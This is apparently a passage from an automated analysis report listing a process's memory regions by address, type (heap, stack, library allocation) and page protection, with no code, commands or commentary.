|
trusted library allocation
|
page read and write
|
||
335D000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
47A8000
|
trusted library allocation
|
page read and write
|
||
AEF5000
|
trusted library allocation
|
page read and write
|
||
45DC000
|
heap
|
page read and write
|
||
4EFD000
|
stack
|
page read and write
|
||
5F89000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4B6D000
|
stack
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4800000
|
trusted library allocation
|
page read and write
|
||
8F25000
|
trusted library allocation
|
page read and write
|
||
5F7A000
|
heap
|
page read and write
|
||
6074000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
AD05000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
A327000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
AD52000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
A760000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
60A5000
|
heap
|
page read and write
|
||
2851000
|
heap
|
page read and write
|
||
A3CB000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AEEE000
|
trusted library allocation
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
6F22000
|
trusted library allocation
|
page read and write
|
||
E34000
|
heap
|
page read and write
|
||
5F4E000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
4E3F000
|
stack
|
page read and write
|
||
288D000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
74FE000
|
stack
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
4C6D000
|
stack
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
A80D000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
A3CE000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4838000
|
trusted library allocation
|
page read and write
|
||
2887000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
33E0000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4C70000
|
trusted library allocation
|
page execute and read and write
|
||
608B000
|
heap
|
page read and write
|
||
C9E1000
|
trusted library allocation
|
page read and write
|
||
606B000
|
heap
|
page read and write
|
||
5F87000
|
heap
|
page read and write
|
||
AFF0000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4818000
|
trusted library allocation
|
page read and write
|
||
A2E7000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4CAE000
|
stack
|
page read and write
|
||
A338000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
288B000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
305E000
|
stack
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
AD3C000
|
trusted library allocation
|
page read and write
|
||
6062000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
83C0000
|
heap
|
page read and write
|
||
742E000
|
stack
|
page read and write
|
||
7770000
|
trusted library allocation
|
page read and write
|
||
677000
|
heap
|
page read and write
|
||
A6D3000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
606F000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7D8D000
|
stack
|
page read and write
|
||
610B000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
75AC000
|
stack
|
page read and write
|
||
A6A1000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A689000
|
heap
|
page read and write
|
||
A7D4000
|
heap
|
page read and write
|
||
877D000
|
stack
|
page read and write
|
||
5F79000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
503C000
|
stack
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
A969000
|
heap
|
page read and write
|
||
E03000
|
heap
|
page read and write
|
||
A2ED000
|
heap
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
604D000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
279C000
|
heap
|
page read and write
|
||
704D000
|
stack
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
34B0000
|
trusted library allocation
|
page read and write
|
||
A411000
|
heap
|
page read and write
|
||
45C4000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
606F000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
685000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A46F000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
52FE000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
DC3000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
75E0000
|
heap
|
page read and write
|
||
2770000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
30F0000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page execute and read and write
|
||
AD08000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7750000
|
trusted library allocation
|
page execute and read and write
|
||
AD4E000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
8969000
|
trusted library allocation
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AE94000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
27F1000
|
heap
|
page read and write
|
||
844D000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
4758000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
8830000
|
heap
|
page read and write
|
||
AFE1000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
A7A1000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
9482000
|
trusted library allocation
|
page read and write
|
||
8AB5000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
67C000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
7D4E000
|
stack
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
45B0000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
288B000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
6076000
|
heap
|
page read and write
|
||
AD3E000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5375000
|
trusted library allocation
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
8970000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
708B000
|
stack
|
page read and write
|
||
606F000
|
heap
|
page read and write
|
||
A8A4000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
4818000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
A853000
|
heap
|
page read and write
|
||
75C3000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
DF9000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
79C1000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AEEA000
|
trusted library allocation
|
page read and write
|
||
604B000
|
heap
|
page read and write
|
||
7005000
|
heap
|
page execute and read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7D0F000
|
stack
|
page read and write
|
||
A2ED000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
288A000
|
heap
|
page read and write
|
||
A457000
|
heap
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
7593000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
609F000
|
heap
|
page read and write
|
||
350A000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5360000
|
heap
|
page execute and read and write
|
||
75F9000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
273D000
|
stack
|
page read and write
|
||
3440000
|
trusted library allocation
|
page read and write
|
||
7970000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
AD3C000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
606C000
|
heap
|
page read and write
|
||
77B0000
|
trusted library allocation
|
page execute and read and write
|
||
8CBE000
|
stack
|
page read and write
|
||
AF41000
|
trusted library allocation
|
page execute
|
||
8D3E000
|
stack
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
8D50000
|
trusted library allocation
|
page read and write
|
||
60A8000
|
heap
|
page read and write
|
||
E5E1000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5D000
|
heap
|
page read and write
|
||
AEF0000
|
trusted library allocation
|
page read and write
|
||
78F0000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
47A8000
|
trusted library allocation
|
page read and write
|
||
95E1000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
BFE1000
|
trusted library allocation
|
page read and write
|
||
8D70000
|
trusted library allocation
|
page read and write
|
||
AF40000
|
trusted library allocation
|
page execute
|
||
5F5F000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
28CA000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
A2E0000
|
heap
|
page read and write
|
||
4DAF000
|
stack
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
7410000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
3561000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
475E000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
794E000
|
stack
|
page read and write
|
||
5F33000
|
heap
|
page read and write
|
||
6099000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
2802000
|
heap
|
page read and write
|
||
605B000
|
heap
|
page read and write
|
||
6066000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
60A1000
|
heap
|
page read and write
|
||
A672000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
6090000
|
heap
|
page read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F49000
|
heap
|
page read and write
|
||
AEF2000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
AE94000
|
trusted library allocation
|
page read and write
|
||
6021000
|
heap
|
page read and write
|
||
4A20000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
718A000
|
stack
|
page read and write
|
||
7000000
|
heap
|
page execute and read and write
|
||
2887000
|
heap
|
page read and write
|
||
A927000
|
heap
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
782F000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
606F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
6F88000
|
trusted library allocation
|
page read and write
|
||
7510000
|
trusted library allocation
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
7597000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
9475000
|
trusted library allocation
|
page read and write
|
||
75EE000
|
stack
|
page read and write
|
||
45F0000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
737E000
|
stack
|
page read and write
|
||
CA8000
|
stack
|
page read and write
|
||
A3CE000
|
heap
|
page read and write
|
||
4E60000
|
trusted library allocation
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
34C3000
|
trusted library allocation
|
page execute and read and write
|
||
4A24000
|
heap
|
page read and write
|
||
4EAC000
|
stack
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
ADB0000
|
heap
|
page read and write
|
||
5F58000
|
heap
|
page read and write
|
||
AD90000
|
trusted library allocation
|
page read and write
|
||
609E000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
786E000
|
stack
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
45F0000
|
heap
|
page read and write
|
||
8950000
|
trusted library allocation
|
page read and write
|
||
3060000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
77A0000
|
trusted library allocation
|
page execute and read and write
|
||
6066000
|
heap
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
4E73000
|
trusted library allocation
|
page read and write
|
||
756E000
|
stack
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
6074000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
4818000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
AD3C000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
7E53000
|
trusted library allocation
|
page read and write
|
||
8F46000
|
trusted library allocation
|
page read and write
|
||
7760000
|
trusted library allocation
|
page read and write
|
||
6088000
|
heap
|
page read and write
|
||
AD4E000
|
trusted library allocation
|
page read and write
|
||
6076000
|
heap
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F50000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
606B000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
45DC000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A3BB000
|
heap
|
page read and write
|
||
AD32000
|
trusted library allocation
|
page read and write
|
||
8790000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7520000
|
trusted library allocation
|
page execute and read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
279C000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7613000
|
heap
|
page read and write
|
||
2760000
|
trusted library allocation
|
page read and write
|
||
A3A5000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
AE94000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
4DFE000
|
stack
|
page read and write
|
||
6066000
|
heap
|
page read and write
|
||
D7A000
|
heap
|
page read and write
|
||
724E000
|
stack
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F69000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
B177000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
7CCE000
|
stack
|
page read and write
|
||
A2C1000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
8826000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A6C0000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
75FE000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
8F72000
|
trusted library allocation
|
page read and write
|
||
8920000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
B592000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4D92000
|
trusted library allocation
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4D0F000
|
stack
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A34A000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F6D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
766D000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
285C000
|
heap
|
page read and write
|
||
6379000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
heap
|
page read and write
|
||
4B2C000
|
stack
|
page read and write
|
||
8CFE000
|
stack
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
7621000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
60A5000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
8840000
|
trusted library allocation
|
page execute and read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
8380000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
45D1000
|
heap
|
page read and write
|
||
AD4E000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A5D0000
|
trusted library allocation
|
page execute
|
||
7AF4000
|
heap
|
page read and write
|
||
A783000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
8F09000
|
trusted library allocation
|
page read and write
|
||
89B0000
|
trusted library allocation
|
page read and write
|
||
60F5000
|
heap
|
page read and write
|
||
50A5000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
34A0000
|
trusted library section
|
page read and write
|
||
35A0000
|
heap
|
page read and write
|
||
A2EB000
|
heap
|
page read and write
|
||
604F000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
AEA0000
|
trusted library allocation
|
page read and write
|
||
6094000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
610D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F7A000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
B5E1000
|
trusted library allocation
|
page read and write
|
||
A620000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A8A4000
|
heap
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
5F6D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
C6C000
|
stack
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
288D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
34D8000
|
heap
|
page read and write
|
||
B44C000
|
stack
|
page read and write
|
||
5F48000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F20000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
7940000
|
trusted library allocation
|
page read and write
|
||
AD4E000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
A7A4000
|
heap
|
page read and write
|
||
2801000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
611E000
|
heap
|
page read and write
|
||
6509000
|
trusted library allocation
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
564F000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
73ED000
|
stack
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
A927000
|
heap
|
page read and write
|
||
4800000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
9481000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
45F7000
|
heap
|
page read and write
|
||
6022000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
AF20000
|
trusted library allocation
|
page read and write
|
||
4EB0000
|
heap
|
page read and write
|
||
D5E1000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
7790000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
6522000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
8930000
|
trusted library allocation
|
page execute and read and write
|
||
8FA0000
|
trusted library section
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
DA2000
|
heap
|
page read and write
|
||
6106000
|
heap
|
page read and write
|
||
8390000
|
trusted library allocation
|
page execute and read and write
|
||
577A000
|
trusted library allocation
|
page read and write
|
||
84F5000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
605C000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A2A8000
|
heap
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
A356000
|
heap
|
page read and write
|
||
83A0000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
6054000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
7AD1000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
B551000
|
heap
|
page read and write
|
||
5F54000
|
heap
|
page read and write
|
||
6066000
|
heap
|
page read and write
|
||
B592000
|
heap
|
page read and write
|
||
533E000
|
stack
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A631000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
4C50000
|
trusted library allocation
|
page read and write
|
||
3410000
|
trusted library allocation
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
5F5D000
|
heap
|
page read and write
|
||
606B000
|
heap
|
page read and write
|
||
53A000
|
stack
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
75EB000
|
heap
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
7500000
|
heap
|
page execute and read and write
|
||
4D8A000
|
trusted library allocation
|
page execute and read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
6030000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
B310000
|
heap
|
page read and write
|
||
2744000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
8F5B000
|
trusted library allocation
|
page read and write
|
||
4BF0000
|
trusted library allocation
|
page read and write
|
||
35C4000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
AD3C000
